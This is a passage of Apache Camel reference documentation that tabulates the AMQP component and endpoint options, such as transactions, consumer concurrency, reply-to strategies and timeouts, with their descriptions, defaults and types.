time-to-live of the message (in milliseconds). | -1 | long\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n| *testConnectionOn Startup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. 
| false | boolean\n| *forceSendOriginal Message* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *jmsOperations* (advanced) | Allows you to use your own implementation of the org.springframework.jms.core.JmsOperations interface. Camel uses JmsTemplate as default. Can be used for testing purpose, but not used much as stated in the spring API docs. | | JmsOperations\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). 
| | DestinationResolver\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *includeSentJMS MessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *includeAllJMSX Properties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *defaultTaskExecutor Type* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. 
| | DefaultTaskExecutor Type\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | JmsKeyFormatStrategy\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *queueBrowseStrategy* (advanced) | To use a custom QueueBrowseStrategy when browsing queues | | QueueBrowseStrategy\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *waitForProvision CorrelationToBeUpdated Counter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvision CorrelationToBeUpdated ThreadSleepingTime* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *correlationProperty* (producer) | Use this JMS property to correlate messages in InOut exchange pattern (request-reply) instead of JMSCorrelationID property. This allows you to exchange messages with systems that do not correlate messages using JMSCorrelationID JMS property. If used JMSCorrelationID will not be used or set by Camel. The value of here named property will be generated if not supplied in the header of the message under the same name. | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. 
| false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *streamMessageType Enabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe AMQP endpoint is configured using URI syntax:\n\n----\namqp:destinationType:destinationName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *destinationType* | The kind of destination to use | queue | String\n| *destinationName* | *Required* Name of the queue or topic to use as destination | | String\n|===\n\n==== Query Parameters (90 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *disableReplyTo* (common) | Specifies whether Camel ignores the JMSReplyTo header in messages. If true, Camel does not send a reply back to the destination specified in the JMSReplyTo header. You can use this option if you want Camel to consume from a route and you do not want Camel to automatically send back a reply message because another component in your code handles the reply message. You can also use this option if you want to use Camel as a proxy between different message brokers and you want to route message from one system to another. | false | boolean\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *jmsMessageType* (common) | Allows you to force the use of a specific javax.jms.Message implementation for sending JMS messages. Possible values are: Bytes, Map, Object, Stream, Text. 
By default, Camel would determine which JMS message type to use from the In body type. This option allows you to specify it. | | JmsMessageType\n| *testConnectionOnStartup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyTo* (consumer) | Provides an explicit ReplyTo destination, which overrides any incoming value of Message.getJMSReplyTo(). | | String\n| *replyToDeliveryPersistent* (consumer) | Specifies whether to use persistent delivery by default for replies. 
| true | boolean\n| *selector* (consumer) | Sets the JMS selector to use | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *acceptMessagesWhileStopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuickStop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *consumerType* (consumer) | The consumer type to use, which can be one of: Simple, Default, or Custom. The consumer type determines which Spring JMS listener to use. Default will use org.springframework.jms.listener.DefaultMessageListenerContainer, Simple will use org.springframework.jms.listener.SimpleMessageListenerContainer. When Custom is specified, the MessageListenerContainerFactory defined by the messageListenerContainerFactory option will determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use. 
| Default | ConsumerType\n| *defaultTaskExecutorType* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *eagerLoadingOfProperties* (consumer) | Enables eager loading of JMS properties and payload as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this options is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *replyToSameDestination Allowed* (consumer) | Whether a JMS consumer is allowed to send a reply message to the same destination that the consumer is using to consume from. This prevents an endless loop by consuming and sending back the same message to itself. | false | boolean\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | Boolean\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). 
The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *replyToConcurrentConsumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyToOnTimeoutMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *replyToOverride* (producer) | Provides an explicit ReplyTo destination in the JMS message, which overrides the setting of replyTo. It is useful if you want to forward the message to a remote Queue and receive the reply message from the ReplyTo destination. | | String\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *correlationProperty* (producer) | When using InOut exchange pattern use this JMS property instead of JMSCorrelationID JMS property to correlate messages. If set messages will be correlated solely on the value of this property JMSCorrelationID property will be ignored and not set by Camel. 
| | String\n| *disableTimeToLive* (producer) | Use this option to force disabling time to live. For example when you do request\/reply over JMS, then Camel will by default use the requestTimeout value as time to live on the message being sent. The problem is that the sender and receiver systems have to have their clocks synchronized, so they are in sync. This is not always so easy to archive. So you can use disableTimeToLive=true to not set a time to live value on the sent message. Then the message will not expire on the receiver system. See below in section About time to live for more details. | false | boolean\n| *forceSendOriginalMessage* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *includeSentJMSMessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *replyToDestinationSelector Name* (producer) | Sets the JMS Selector using the fixed name to be used so you can filter out your own replies from the others when using a shared queue (that is, if you are not using a temporary reply queue). | | String\n| *streamMessageTypeEnabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *allowSerializedHeaders* (advanced) | Controls whether or not to include serialized headers. Applies only when transferExchange is true. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. 
If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *headerFilterStrategy* (advanced) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *includeAllJMSXProperties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | String\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. 
| | MessageConverter\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which is invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just a hint to the JMS broker. If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageListenerContainer Factory* (advanced) | Registry ID of the MessageListenerContainerFactory used to determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use to consume messages. Setting this will automatically set consumerType to Custom. | | MessageListener ContainerFactory\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just a hint to the JMS broker. If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be sent back in the response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payload is an Exchange and not a regular payload. 
| false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on Message#isFault() will be sent back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstants#JMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set via org.apache.camel.Message#setFault(boolean). You may want to enable this when using Camel components that support faults, such as the SOAP-based cxf or spring-ws. | false | boolean\n| *useMessageIDAsCorrelation ID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *waitForProvisionCorrelation ToBeUpdatedCounter* (advanced) | Number of times to wait for the provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvisionCorrelation ToBeUpdatedThreadSleeping Time* (advanced) | Interval in millis to sleep each time while waiting for the provisional correlation id to be updated. | 100 | long\n| *errorHandlerLoggingLevel* (logging) | Allows configuring the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStackTrace* (logging) | Allows controlling whether stack traces should be logged or not by the default errorHandler. | true | boolean\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *transacted* (transaction) | Specifies whether to use transacted mode. | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. 
